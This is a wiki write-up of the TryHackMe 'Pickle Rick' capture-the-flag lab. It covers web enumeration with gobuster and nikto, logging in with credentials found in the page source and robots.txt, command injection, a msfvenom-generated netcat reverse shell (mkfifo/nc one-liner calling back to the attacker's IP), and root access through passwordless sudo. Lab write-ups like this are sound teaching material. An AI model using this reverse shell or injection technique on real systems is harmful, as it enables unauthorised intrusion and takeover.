Write-ups/THM/Pickle Rick

From Wiki Aghanim
Jump to navigationJump to search
Pickle Rick
Platform TryHackMe
OS Linux
Difficulty Easy
Techniques Web Enumeration, Command Injection

This is a CTF on TryHackMe website.


The task is that you will have to help Pickle Rick find 3 ingredients so he can turn himself back into a human.


When you deploy the machine you are presented with a website.



Enumeration stage

The first thing I like to do is look at the source code. We find a username: R1ckRul3s.



We can look for any hidden directories. I like to use Gobuster for this task. The command I´ll use is:


gobuster dir -u http://10.10.222.6 -w /usr/share/wordlists/dirb/common.txt -q

/.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /assets (Status: 301) /index.html (Status: 200) /robots.txt (Status: 200) /server-status (Status: 403)


In /robots.txt we find something interesting.


Wubbalubbadubdub


It is smart to use other tools aswell, and not just rely on one. You can use photon, raccoon or Nikto for example. I will use Nikto with the command:


nikto -h 10.10.222.6

- Nikto v2.1.5

+ Target IP: 10.10.222.6 + Target Hostname: ip-10-10-222-6.eu-west-1.compute.internal + Target Port: 80 + Start Time: 2021-05-22 23:49:17 (GMT1)

+ Server: Apache/2.4.18 (Ubuntu) + Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686 + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd). + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + Cookie PHPSESSID created without the httponly flag + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host + End Time: 2021-05-22 23:49:26 (GMT1) (9 seconds)

+ 1 host(s) tested



We find an admin login page, /login.php.



From previous enumeration we found the username, and from robots.txt we would assume that that would be the password.


After logging in, we are presented with this.



Gaining Access


The other tabs only says that: Only the real rick can enter.


We will try out some commands, like ls.



We found the first ingredient. Lets try and cat it.



That dosent work. Iinstead I will try and create a reverse shell to the webserver instead.


We can use msvenom to generate a revershell payload that we can try and run.


root@ip-10-10-235-26:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.235.26 lport=4444 R [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 94 bytes mkfifo /tmp/siank; nc 10.10.83.119 4444 0/tmp/siank 2>&1; rm /tmp/siank


I will setup netcat so it listens to port 4444 and execute the command on the website. This will give me a reverse Shell, and I can try and read the files again.


root@ip-10-10-235-26:~# nc -lvnp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.10.222.6 35688 received!@ ls Sup3rS3cretPickl3Ingred.txt assets clue.txt denied.php index.html login.php portal.php robots.txt cat Sup3rS3cretPickl3Ingred.txt mr. meeseek hair


The clue says: Look around the file system for the other ingredient.


cd home ls rick ubuntu cd rick ls second ingredients cat second\\ ingredients 1 jerry tear


We can try and see if the user is in sudoers. There is no password for sudo, which is not good.


sudo su su - root mesg: ttyname failed: Inappropriate ioctl for device whoami root cd /root ls 3rd.txt snap cat 3rd.txt 3rd ingredients: fleeb juice

Retrieved from "https://book.ghanim.no/index.php?title=Write-ups/THM/Pickle_Rick&oldid=1140"